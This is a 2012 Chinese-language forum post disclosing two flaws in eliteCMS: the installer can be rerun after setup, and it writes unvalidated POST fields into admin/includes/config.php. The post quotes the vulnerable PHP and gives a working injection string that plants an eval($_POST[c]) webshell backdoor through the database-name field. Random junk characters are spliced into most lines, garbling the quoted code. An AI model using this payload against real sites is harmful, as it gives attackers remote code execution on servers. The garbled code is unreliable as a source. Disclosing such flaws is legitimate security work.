找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2274|回复: 0
打印 上一主题 下一主题

eliteCMS安装文件未验证 + 一句话写入安全漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-18 13:59:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
3 ?& K" h+ F* l
/ Y1 G! ^! ]9 X% i, p3 G2 d另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
1 M0 l. M3 O. k4 e7 J1 a我们来看代码:8 c% d3 _+ b4 y6 l. V% _8 k7 t4 j4 q

, r- i5 A& z8 o! h...& W; z& ~: _& ]) X/ z7 @7 c
elseif ($_GET['step'] == "4") {2 X# r, O' n( f
    $file = "../admin/includes/config.php";
# D) [$ y. Q! Y' q    $write = "<?php\n";: Z" \+ J9 ]/ h: ~" L; @, c1 g
    $write .= "/**\n";
6 p% f! [3 t/ K% C1 v    $write .= "*\n";# d6 P6 f7 z$ i) f( j
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";! ]" G6 M4 P0 U1 l6 f8 S
...略...
0 C; B9 z3 E! ]    $write .= "*\n";: t7 V- {2 N3 `1 O' J
    $write .= "*/\n";
) C1 f+ f/ B# Y( F    $write .= "\n";
7 f9 ]% w( m* g    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";2 O$ }( i% L% s3 R
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
( o8 M. M4 c1 N# k- R# K    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";* W7 [# o& ]& J' D
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";3 T: U6 I; g. }
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";7 l' C5 U, H7 p& c" {0 q! ]
    $write .= "if (!\$connection) {\n";" H; R5 ^$ ~/ p( O/ l
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
  d$ V" G, F1 o4 f% D# a    $write .= "        \n";
8 Y* F* v4 r. ^: W    $write .= "} \n";
9 h/ {. x8 G  f  u    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";: J& _3 B# a& t/ `
    $write .= "if (!\$db_select) {\n";/ N5 `, }5 l: H* X* r0 B5 o7 D, p
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
1 V. W7 R, r3 ]( _    $write .= "        \n";9 e$ ?, |" \3 v( J& R5 T8 {
    $write .= "} \n";1 w6 \8 x; K1 ~3 v! I
    $write .= "?>\n";7 V/ U* i( y# B' I4 s1 X$ t( f
# }6 j5 i6 ?9 O& L
    $writer = fopen($file, 'w');
5 b7 Q! C9 E, a+ W) J6 R. ^...
6 j5 K, }8 ]- s6 ~! z6 l2 m& U' T& D
, o, [% r8 p( A! z  p) X在看代码:( U% o  Y- R; c% J0 M

# t' U# [: Z. F' Q( p$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];/ R9 r) l. M5 p* c4 `% |0 X/ w6 {
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
9 T- |7 v. S+ Q3 n/ C$_SESSION['DB_USER'] = $_POST['DB_USER'];2 ?3 J0 k+ M$ s' l- b/ T8 @# R- i3 r
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];- L0 R- z) z- B, W( |" L6 s& Z

: E+ t. W4 [! |; j1 g取值未作任何验证1 q8 Y' X+ v% n9 I8 D
如果将数据库名POST数据:
2 _9 w( S" m! r5 ~) e! l
& n6 G4 T& W- p"?><?php eval($_POST[c]);?><?php
4 V" z  f' C$ r5 b1 B( ^: O) N   w# H) ?+ [* q' `
将导致一句话后门写入/admin/includes/config.php
. m- t$ N1 ~0 T; U( q) s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表